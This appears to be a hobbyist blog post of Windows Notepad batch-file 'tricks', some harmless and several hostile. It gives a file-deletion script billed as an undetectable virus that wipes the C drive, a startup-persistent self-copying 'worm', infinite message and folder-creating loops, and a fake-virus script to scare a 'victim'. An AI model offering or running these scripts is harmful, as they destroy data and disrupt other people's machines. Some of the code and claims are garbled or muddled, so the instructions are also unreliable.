Header Ads

Breaking News
recent

fun with notepad

Bored with your PC
do Something Crazy n Funny with your notepad

(-1-)
Make Dangerous Virus In A Minute ( Oo )
In this post i will teach you to make simple yet very powerful or you can say harmful computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any Anti Virus.

What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus?

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.


(-2-)

Using this notepad trick you can annoy anyone and can actually force them to log off .
This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:

>Open Notepad.
> Copy the below mentioned text in your notepad file:

@echo off
:BEGIN
msg * Welcome
msg * To
msg * Psycho Cyborg
msg * Thanks for visiting
goto BEGIN

>Save the file with .bat extension like message.bat. After saving the file just open it (by double clicking) and see what happens..........


 (-3-)

OPEN CMD CONTINUOUSLY ....

This trick is used to open CMD continuously till then you want,
1-just open Notepad and write :

START
.
.
.
.
START

2-Depending upon you how many times you want to open CMD, you can make as many as you would like.
Save file as any name you want with .bat extension. Then open that file and you observe that how many times you write START in Notepad, the CMD console box is open same as number of START written in Notepad. ...............


(-4-)


Here is a trick for opening all your favorite sites at one time
follow these steps:
1. Open your notepad first go to start menu then open all programs then open accessories and in the accessories you will find notepad.

2.In your notepad type the following code
@echo off
start www.whatsapp.do.am
start www.google.com
start www.facebook.com

3. now click save as and replace the whole name with all sites.bat and now save it. now open that bat file where you saved it all the sites that you typed in the notepad will appear.

Note: you can also add your favorite sites in it by typing start and after start type the name of the site you want.


(-5-)

Now You Can Chat With Command Prompt Through So Here IS A Trick.....
1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see on cmd as
MESSENGER:
USER:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
MESSENGER:
USER:IP ADDRESS OF your friend
Message:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!


(-6-)


How we create more then 10000 Empty Folder Created -

1) Open your notepad and type the following code.

@echo off
:top
md %random%
goto top

2) Save as anyname.bat

3) Click to Open anyname.bat file...



(-7-)

I will teach you how to do a few basic things in notepad, notepad++, and how to use them to your advantage!

First we will look at the Matrix trick!

Open a new notepad document
Paste this in the document

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

Then
save it as whatever you want as long as it has .bat after it!

This will create a command prompt that looks like the matrix! With green letters and everything!

Next is the fake virus trick!
1.Open a new notepad document

Paste this in the document

@echo off
cls
echo Fatal Error!! Your computer is under attack!!
pause
echo Deleting Files
pause
:files
echo !323%%%@#@GJFGG42JG
echo !3424%@#%^&@52%@%gs
echo !@$@^624@$6262$hG
echo !@#4-07234&5*((6hkd
echo !&^%78755&*%478*%$&
echo !^$$68*$78()&4578
echo !&8898*65$$566$68(9
goto files*
3.Save it as anything you want as long as it has .bat after it!

Then watch your victim's face as it scares the crap out of them!!

That is all for now but soon I will be posting more!
I hope you enjoy!


(-8-)

Now i'am gonna tell you how to write a simple worm virus.

1.Log on to your computer as an administrator.

2.Go on C drive and create a folder, name it "Programs"

3.Open up notepad and type in "@echo off"

4.Then, write "Copy C:\Programs\virus.bat C:\Programs" on the second line. On the third line write "Start C:\Programs\virus.bat".

5.Click "Save as" and save as virus.bat in the file (Programs) you just made.

6.If you want the worm to start whenever the computer starts, right click on "virus.bat" and click create shortcut. A shortcut will be made on programs.

7.Right click on the shortcut icon and click "cut".

8.Right click on the shortcut and click "copy".

9.Right click on your start menu and click "explore".

10.Go to All Programs, then find the file named startup.

11.Paste the shortcut onto the startup folder.

12.Right click on the shortcut and go to properties, click on hidden, then press "Apply" or "OK".

You have successfully made a working worm virus. To start it, restart your computer and the disk space on C drive will be eaten away!!!!!!!!!!!!

caution:To get rid of the worm virus just simply delete the "programs" file.


(-9-)

convert text to audio without using software>>>>
open notepad>>
then copy and paste these codes

Dim msg,sapi
msg=inputBox("Enter Your Text For Conversion","By Expert HACKER A.K.")
set sapi=createObject("sapi.spvoice")
sapi.speak msg

then save as audio.vbs
then open








No comments:

Psycho Cyborg. Powered by Blogger.